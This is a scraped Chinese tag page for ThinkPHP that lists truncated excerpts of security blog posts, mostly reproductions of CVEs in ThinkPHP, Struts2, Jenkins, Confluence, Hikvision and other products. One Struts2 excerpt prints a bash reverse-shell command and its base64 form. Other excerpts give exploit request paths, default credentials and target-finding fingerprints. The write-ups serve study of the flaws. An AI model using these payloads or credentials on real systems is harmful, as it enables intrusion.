E-COM-NET
首页
在线工具
Layui镜像站
SUI文档
联系我们
推荐频道
Java
PHP
C++
C
C#
Python
Ruby
go语言
Scala
Servlet
Vue
MySQL
NoSQL
Redis
CSS
Oracle
SQL Server
DB2
HBase
Http
HTML5
Spring
Ajax
Jquery
JavaScript
Json
XML
NodeJs
mybatis
Hibernate
算法
设计模式
shell
数据结构
大数据
JS
消息中间件
正则表达式
Tomcat
SQL
Nginx
Shiro
Maven
Linux
Thinkphp漏洞复现
服务攻防-开发组件安全&Solr搜索&Shiro身份&Log4j日志&本地CVE环境复现
组件安全-Log4J-日志记录章节点:1、目标判断-端口扫描&组合判断&信息来源2、安全问题-配置不当&CVE漏洞&弱口令爆破3、复现对象-数据库&中间件&开发框架&应用协议常见语言开发框架:PHP:
Thinkphp
LaravelYIICodeIgniterCakePHPZend
SuperherRo
·
2024-01-27 22:49
#
服务安全篇
安全
solr
log4j
shiro
CVE
服务攻防-开发框架安全&SpringBoot&Struts2&Laravel&
ThinkPHP
&CVE复现
知识点:1、PHP-框架安全-
Thinkphp
&Laravel2、J2EE-框架安全-SpringBoot&Struts2章节点:1、目标判断-端口扫描&组合判断&信息来源2、安全问题-配置不当&CVE
SuperherRo
·
2024-01-27 22:48
#
服务安全篇
安全
spring
boot
struts
thinkphp
laravel
[BT]小迪安全2023学习笔记(第17天:PHP开发-TP框架)
第17天名词解释
ThinkPHP
是一个开源的、快速的、简单的面向对象的轻量级PHP框架,主要用于构建Web应用程序。
Bluetuan_aaa
·
2024-01-27 15:48
小迪安全学习笔记
安全
学习
笔记
【复现】JieLink+智能终端操作平台弱口令漏洞_28
目录一.概述二.漏洞影响三.
漏洞复现
1.漏洞一:四.修复建议:五.搜索语法:六.免责声明一.概述JeLink+智能终端操作平台(JSOTC2016fJeLink+)是捷顺历经多年行业经验积累,集智能硬件技术视频分析技术
穿着白衣
·
2024-01-27 14:45
安全漏洞
安全
系统安全
web安全
网络安全
【复现】Laykefu客服系统后台漏洞合集_29
目录一.概述二.漏洞影响三.
漏洞复现
1.漏洞一:2.漏洞二:3.漏洞三:4.漏洞四:四.修复建议:五.搜索语法:六.免责声明一.概述Laykefu客服系统是
thinkphp
5+Gatewayworker
穿着白衣
·
2024-01-27 14:10
安全漏洞
安全
web安全
系统安全
网络安全
跟微擎类型
thinkphp
开发的框架-tpwe
tpwe介绍https://gitee.com/xiaoetongo/tpwe.git为什么开发tpwe,tpwe顾名思义
thinkphp
+微擎,自己是这两个开源框架的忠实的粉丝,
thinkphp
足够的开放
晓天菌
·
2024-01-27 14:01
ThinkPHP
5 RCE漏洞代码审计
前言
thinkphp
下载漏洞影响版本:5.0.0app['hook']->listen('module_init');try{//实例化控制器$instance=$this->app->controller
Yn8rt
·
2024-01-27 14:56
thinkPHP
代码审计
cms
mvc
php
thinkphp
Jenkins CLI 任意文件读取
漏洞复现
(CVE-2024-23897)
0x01产品简介Jenkins是一个开源的自动化服务器软件,用于构建、测试和部署软件项目。它提供了一种强大的方式来自动化软件开发和交付流程,以提高开发团队的效率和生产力。0x02漏洞概述漏洞成因命令行接口文件读取:Jenkins内置的命令行接口(CLI)存在一个特性,允许在命令参数中用@字符后跟文件路径来替换为文件内容。这导致攻击者能够读取Jenkins控制器文件系统上的任意文件。权限绕过:拥有O
OidBoy_G
·
2024-01-27 11:37
漏洞复现
jenkins
web安全
安全
thinkphp
三步整合文件上传系列-华为云obs文件上传
thinkphp
6华为云filesystem基于dscmall/laravel-filesystem-obs轻度封装tp安装composerrequiredeath_satan/
thinkphp
-huawei-obs
death撒旦
·
2024-01-27 10:40
php
thinkphp6
php
thinkphp
宏景eHRSmsAcceptGSTXServle存在XXE漏洞
指纹特征app="HJSOFT-HCM"
漏洞复现
POST/servlet/sms/SmsAcceptGSTXServletHTTP/1.1Host:User-Agent:Mozilla/5.0(WindowsNT10.0
LZsec
·
2024-01-27 09:01
漏洞复现
web安全
用友-移动系统管理-getApp接口存在SQL注入
指纹特征app="用友-移动系统管理"
漏洞复现
POST/mobsm/common/..
LZsec
·
2024-01-27 08:31
漏洞复现
sql
数据库
web安全
金盘移动图书管理系统doUpload.jsp接口存在文件上传漏洞
指纹特征app="金盘软件-金盘移动图书馆系统"
漏洞复现
POST/pages/admin/tools/uploadFile/doUpload.jspHTTP/1.1Host:User-Agent:Mozilla
LZsec
·
2024-01-27 08:30
漏洞复现
java
开发语言
web安全
【
漏洞复现
】上海冰峰ICEFLOW VPN信息泄露漏洞
Nx01产品简介上海冰峰计算机网络技术有限公司是国内VPN、流量管理、行为管理、链路负载均衡、下一代防火墙设备供应商和IT价值解决方案提供商。冰峰网络reporter系统是一套数据报表管理系统。Nx02漏洞描述上海冰峰计算机网络技术有限公司ICEFLOWVPNRouter系统存在信息泄露漏洞。攻击者可通过该漏洞获取系统日志信息。Nx03产品主页hunter-query:body="上海冰峰计算机网
晚风不及你ღ
·
2024-01-27 08:51
【漏洞复现】
web安全
【
漏洞复现
】艺创科技智能营销路由器后台命令执行漏洞
Nx03产品主页hunter-query:title=="艺创科技"Nx04
漏洞复现
漏洞点存在系统维护-命令控制台
晚风不及你ღ
·
2024-01-27 08:11
【漏洞复现】
web安全
uni-app h5对接
thinkphp
5接口跨域
uni-apph5对接
thinkphp
5接口跨域问题描述请求接口提示AccesstoXMLHttpRequestat'http://*******'fromorigin'http://localhost
疯癫居士
·
2024-01-27 08:36
php
uni-app
php
PHP开发框架Laravel——Laravel-Admin学习
PHP这块的框架,之前接触过Yii和
ThinkPHP
,现在都忘得差不多了,但是现在Laravel的呼声很高,看了下业内统计,Laravel的流行度远超过其他PHP框架。
佛贝鲁先生
·
2024-01-27 08:32
ThinkPHP
5.0.0~5.0.23反序列化利用链分析
本次测试环境仍然是
ThinkPHP
v5.0.22版本,我们将分析其中存在的一条序列化链。一道CTF题这次以一道CTF题作为此次漏洞研究的开头。题中涉及PHP的死亡绕过技巧,是真实环境中存在的情况。
昵称还在想呢
·
2024-01-27 07:02
PHP代码审计
android
php
安全
web安全
某赛通电子文档安全管理系统 hiddenWatermark/uploadFile 文件上传
漏洞复现
0x01产品简介某赛通电子文档安全管理系统(简称:CDG)是一款电子文档安全加密软件,该系统利用驱动层透明加密技术,通过对电子文档的加密保护,防止内部员工泄密和外部人员非法窃取企业核心重要数据资产,对电子文档进行全生命周期防护,系统具有透明加密、主动加密、智能加密等多种加密方式,用户可根据部门涉密程度的不同(如核心部门和普通部门),部署力度轻重不一的梯度式文档加密防护,实现技术、管理、审计进行有机
OidBoy_G
·
2024-01-27 07:50
漏洞复现
安全
web安全
ThinkPhp
5.0.24 去除路径 index.php
默认情况下,使用
THINKPHP
框架的站点,url路径中必须出现index.php,这个比较不爽我使用5.0.24这个版本,经过测试,我的方法是:打开public目录下的.htaccess,然后随意打个空格
醉の虾
·
2024-01-27 06:16
ThinkPHP
宝塔linux面板+
thinkphp
+php7.4安装pdo_sqlsrv和sqlsrv扩展包
安装扩展sqlsrv与pdo_sqlsrv步骤第一步:加入微软源第二步:安装odbc驱动程序第三步:安装php7.4对应的pdo_sqlsrv扩展包第四步:解压缩pdo_sqlsrv扩展包并进入扩展包目录第五步:使用php7.4目录的phpize第六步:在php.ini配置文件中加入扩展重要说明sqlsrv扩展包官方下载地址写在最后的话第一步:加入微软源进入宝塔面板终端(黑屏)操作界面,输入如下指
skywesdy
·
2024-01-27 01:54
PHP教程
fastAdmin
接口教程
linux
php
sqlserver
php 连接sqlserver踩过的坑,大坑小坑连环坑
环境本地宝塔CentOS7,php7.4sqlserver2012本地navicat能顺利连接sqlserver,安装ODBC参考文档宝塔linux面板+
thinkphp
+php7.4安装pdo_sqlsrv
一只路过的猫咪
·
2024-01-27 01:53
php
开发语言
WordPress wp-file-manager 文件上传漏洞 CVE-2020-25213
1.
漏洞复现
WordPress6.2插件:wp-file-manager6.0,FileManager(advancedview)–WordPressplugin|WordPress.org(https
网安Dokii
·
2024-01-26 23:22
android
安全
网络安全
CRM客户管理系统源码,基于
ThinkPHP
开发
CRM的数据是企业的核心:客户的数量、客单价、销售人员的信息等,本地部署使企业更加放心和安心!CRM客户管理系统是企业在信息化管理的进程中的必然,通过CRM进行客户售前的跟进与客户售后的管理让企业可以事半功倍,但是由于每一个企业都或多或少有着销售规则和侧重点的不同,使得CRM无法标准化;系统包含以下功能模块:客户管理:包含客户池和联系人管理;过程管理:注定要是员工对客户跟进过程对记录;订单合同管理
LAOLIUSHUO
·
2024-01-26 22:43
CRM源码
开源CRM
客户管理系统
仿支付宝php源码,
thinkPHP
仿华为商城带支付宝接口(完整源码+数据库脚本)
【实例简介】后台地址:http://域名/index.php/Admin/Login/index.html管理员账号:admin密码:admin将数据库名更改为ceshi.sql【实例截图】脚本【核心代码】/**网站后台订单详情Model类*/namespaceAdmin\Model;useThink\Model\ViewModel;ClassOrderDescViewModelextendsVi
多弗拉门戈
·
2024-01-26 21:41
仿支付宝php源码
本人使用PHP的cul扩展加querlist类库写的爬虫程序加
thinkphp
8
#随机成三千个五位数的不重复数字$arr=[];for($i=1;$i$vs){//删除视频标题重复出现过两次的数据$data=Db::name('hp')->field('spbt')->group('spbt')->having('count(spbt)>1')->select();foreach($dataas$k=>$v){Db::name('hp')->where('spbt',$v['
qq_57952822
·
2024-01-26 21:40
php
php
爬虫
android
CVE-2016-2183
漏洞复现
下面是CVE-2016-2183的
漏洞复现
过程:1.安装OpenSSL库:先下载OpenSSL库的源代码,解压并进入解压目录,执行以下命令:```./configmakemakeins
网络战争
·
2024-01-26 17:51
网络安全
log4j
thinkphp
全局拦截器的实现----------小白的天堂
最近在学习在用
thinkphp
框架写后台,然后想实现自动拦截所有的前台请求,然后判断前台请求是否符合条件,不符合条件的拦截下来返回错误数据,符合条件的自动放行。
qq_386605092
·
2024-01-26 10:08
thinkphp
php
thinkphp
Thinkphp
Ueditor 页面编辑器显示标签问题
ueditor富文本保存内容,页面展示时显示内容含有标签解决办法:{$company.info|htmlspecialchars_decode}Ueditor富文本保存后,富文本编辑器内,显示内容是标签,解决办法:{$item.info|html_entity_decode}
0c4d
·
2024-01-26 06:31
php
Fastjson代码审计实战
代码审计-
漏洞复现
漏洞分析采用的是华夏ERP2.3,查看pom.xml文件发现fastjson版本1.2.55,该版本存在漏洞,利用DNSlog进行验证。
Hello_Brian
·
2024-01-26 01:56
代码审计
网络安全
web安全
java
安全
【
漏洞复现
】Hikvision流媒体管理服务器后台文件读取漏洞
Nx01产品简介Hikvision(海康威视)是一家在中国颇具影响力的安防公司,其网络摄像头产品在市场上占据了相当大的份额。综合安防管理平台基于“统一软件技术架构”理念设计,采用业务组件化技术,满足平台在业务上的弹性扩展。Nx02漏洞描述Hikvision流媒体管理服务器存在弱口令漏洞(admin/12345),攻击者可利用该漏洞登录后台通过文件遍历漏洞获取敏感信息Nx03产品主页fofa-que
晚风不及你ღ
·
2024-01-25 23:27
【漏洞复现】
web安全
【
漏洞复现
】Hikvision流媒体管理服务器信息泄露漏洞
Nx01产品简介Hikvision(海康威视)是一家在中国颇具影响力的安防公司,其网络摄像头产品在市场上占据了相当大的份额。综合安防管理平台基于“统一软件技术架构”理念设计,采用业务组件化技术,满足平台在业务上的弹性扩展。Nx02漏洞描述HikvisionHikvision流媒体管理服务器user.xml配置文件存在未授权访问,攻击者通过漏洞可以获取网站账号密码。Nx03产品主页fofa-quer
晚风不及你ღ
·
2024-01-25 23:27
【漏洞复现】
web安全
docker compose部署nginx,php,mysql
我的php框架为
thinkphp
6rc,前端为vue。我将tp6的入口文件改为home.php。
Apa琦
·
2024-01-25 20:13
中间件安全
中间件安全vulhub
漏洞复现
:https://vulhub.org/操作教程:https://www.freebuf.com/sectool/226207.html一、ApacheApache(音译为阿帕奇
果粒程1122
·
2024-01-25 18:29
中间件
安全
网络安全
web安全
全新UI基于
Thinkphp
的最新自助打印系统/云打印小程序源码/附教程
这是一款全新的基于
Thinkphp
的最新自助打印系统,最新UI界面设计的云打印小程序源码,带有简单的教程。源码下载:YISHEN源码网(ms3.ishenglu.c)om
ms3_ishenglu
·
2024-01-25 13:17
小程序
6.php开发-个人博客项目&Tp框架&路由访问&安全写法&历史漏洞
——TPURL访问Index.php-放在控制器目录下编辑Test.php--要继承一下带参数的——————加入数据库代码--不过滤--自己写过滤--手册(官方)的过滤用TP框架找漏洞:如何判断网站是
thinkphp
金灰
·
2024-01-25 10:35
php开发基础
php
安全
开发语言
后端
网络安全
前端
mysql
ThinkPHP
5.0 实现 app微信支付功能
第一步:建立一个支付控制器pay.php,是由上个页面选择好支付方式之后确认支付后需要经过的控制器(这里选择的是微信支付),代码如下:where($where)->find();//获取支付方式$pay_type=input('post.pay_type');//微信支付或者支付宝支付//获取支付金额$money=input('post.totle_sum');//判断支付方式switch($pa
铁匠简记
·
2024-01-25 09:54
Monitorr 任意文件上传
漏洞复现
(CVE-2024-0713)
0x01产品简介Monitorr是一个实时显示任何网络应用程序或服务状态的网络前端。0x02漏洞概述Monitorr1.7.6m版本中发现漏洞。它已被宣布为关键。受此漏洞影响的是组件服务配置的文件/assets/php/upload.php的未知功能。对参数fileToUpload的操作会导致不受限制的上传,未经身份验证的攻击者可远程上传恶意文件导致服务器失陷。0x03复现环境FOFA:body=
OidBoy_G
·
2024-01-25 06:01
漏洞复现
web安全
安全
Atlassian Confluence Data Center and Server 权限提升
漏洞复现
(CVE-2023-22515)
0x01产品简介AtlassianConfluence是一款由Atlassian开发的企业团队协作和知识管理软件,提供了一个集中化的平台,用于创建、组织和共享团队的文档、知识库、项目计划和协作内容。是面向大型企业和组织的高可用性、可扩展性和高性能版本。0x02漏洞概述AtlassianConfluenceDataCenterandServer存在权限提升漏洞,未经身份验证的远程攻击者可以利用该漏洞
OidBoy_G
·
2024-01-25 06:30
漏洞复现
atlassian
安全
web安全
蓝凌OA sysUiExtend.do 任意文件上传
漏洞复现
0x01产品简介蓝凌核心产品EKP平台定位为新一代数字化生态OA平台,数字化向纵深发展,正加速构建产业互联网,对企业协作能力提出更高要求,蓝凌新一代生态型OA平台能够支撑办公数字化、管理智能化、应用平台化、组织生态化,赋能大中型组织更高效的内外协作与管理,支撑商业模式创新与转型发展。0x02漏洞概述蓝凌OAsysUiExtend.do接口处存在任意文件上传漏洞,未经过身份认证的攻击者可通过构造压缩
OidBoy_G
·
2024-01-25 06:28
漏洞复现
安全
web安全
[
漏洞复现
]Apache Struts2/S2-015 (CVE-2013-2134)
二、
漏洞复现
春秋云境.com进入靶场开始复现构造payload/${#context['xwork.MethodAccessor.denyMethodExecution']=false,#m=#_
free key
·
2024-01-25 06:41
漏洞复现
春秋云境靶场
Struts
apache
struts
web安全
安全
[
漏洞复现
]Apache POI < 3.10.1 XXE(CVE-2014-3529)
二、
漏洞复现
春秋云境.com进入靶场准备文件和环境创建一个[Content_Types].xml文件和xxe.dtd文件注意名字不可修改###xxe.dtd###">%all;###[Content_Typ
free key
·
2024-01-25 06:10
漏洞复现
春秋云境靶场
web安全
apache
安全
[
漏洞复现
]Apache Struts2/S2-013 (CVE-2013-1966)
二、
漏洞复现
春秋云境.com进入靶场开始复现bash-i>&/dev/tcp/127.0.0.1/99990>&1base加密bash-c{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOT
free key
·
2024-01-25 06:10
漏洞复现
春秋云境靶场
Struts
apache
struts
java
web安全
安全
[
漏洞复现
] Craft (CVE-2023-41892)
前言本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!一、漏洞情况分析CraftCMS是美国Pixel&tonic公司的一套内容管理系统(CMS)。一个开源的内容管理系统,它专注于用户友好的内容创建过程,逻辑清晰明了,是一个高度自由,高度自定义设计的平台吗,可以用来创建个人或企业网站也可以搭建企业级电子商务系统。Pixel&tonicCraftCMS4.4.15之前版本存在代码
free key
·
2024-01-25 06:10
漏洞复现
安全
web安全
[
漏洞复现
]Apache Shiro < 1.6.0 验证绕过漏洞(CVE-2020-13933)
二、
漏洞复现
春秋云境.com进入靶场开始复现/admin/%3b三、漏洞处置建议把靶场关了,跟漏洞说“白白吧”
free key
·
2024-01-25 06:10
春秋云境靶场
漏洞复现
安全
网络
web安全
[
漏洞复现
]Apache Struts2/S2-015 (CVE-2013-2135)
二、
漏洞复现
春秋云境.com进入靶场开始复现构造好payload,弹nc${#context['xwork.MethodAccessor.denyMethodExecution']=false,#m=#
free key
·
2024-01-25 06:04
Struts
春秋云境靶场
apache
struts
java
web安全
安全
thinkphp
5.0 auth验证(里面我已经自己修改好了,可以用了)
首先要创立数据表,和导入auth类,放那里都行,记得用命名空间引入就行我这里做一个解释,和用法说明,他是有三个表,一个是,规则表,一个是,用户组表,一个是,用户组和用户的关联表。还有一个是,用户表,不过这个不属于auth,属于自己登陆的。里面表结构我不写了,下面已经很详细了,不懂的在沟通。里面的关键是我添加了,多条规则验证。在下面(//这里是自己判断的,可以添加多条规则用英文逗号,分隔开。)里面,
两个人的幸福online
·
2024-01-25 00:11
thinkphp
No input file specified的解决方法
有时候使用
thinkphp
的时候,删除入口文件会提示Noinputfilespecified原因是.htaccess的原因,写成下面这样就可以隐藏index.php入口文件了,他的原理是用正则表达式来控制路由
两个人的幸福online
·
2024-01-25 00:11
thinkphp
unicms 使用
thinkphp
8 重构版
unicms有你存在一切安好2023年6月使用
thinkphp
8,重构了cms。php最低使用php8版。参考了多个cms结合10年的开发经验,打造了开箱机用,简单的cms系统。
两个人的幸福online
·
2024-01-25 00:40
thinkphp
php学习
thinkphp8
重构
thinkphp
5.0 模型操作(一)
新建模型有两个方法,一个是手动创建新建model文件夹新建文件user.php。最好名字和表名对应写代码phpthinkmake:modelindex/Blog模型实例化有三种方式用静态方法useapp\index\model\User;$li=User::get(1);用加载类usethink\Loader;$user=Loader::model('user');$li=$user::get(1
两个人的幸福online
·
2024-01-25 00:40
thinkphp
公众号的开发
利用
thinkphp
和hc基本实现了微信公众账号的常用所有功能github:https://github.com/lizhilicctv/wechat码云:https://gitee.com/lizhiliwo
两个人的幸福online
·
2024-01-25 00:08
php学习
上一页
4
5
6
7
8
9
10
11
下一页
按字母分类:
A
B
C
D
E
F
G
H
I
J
K
L
M
N
O
P
Q
R
S
T
U
V
W
X
Y
Z
其他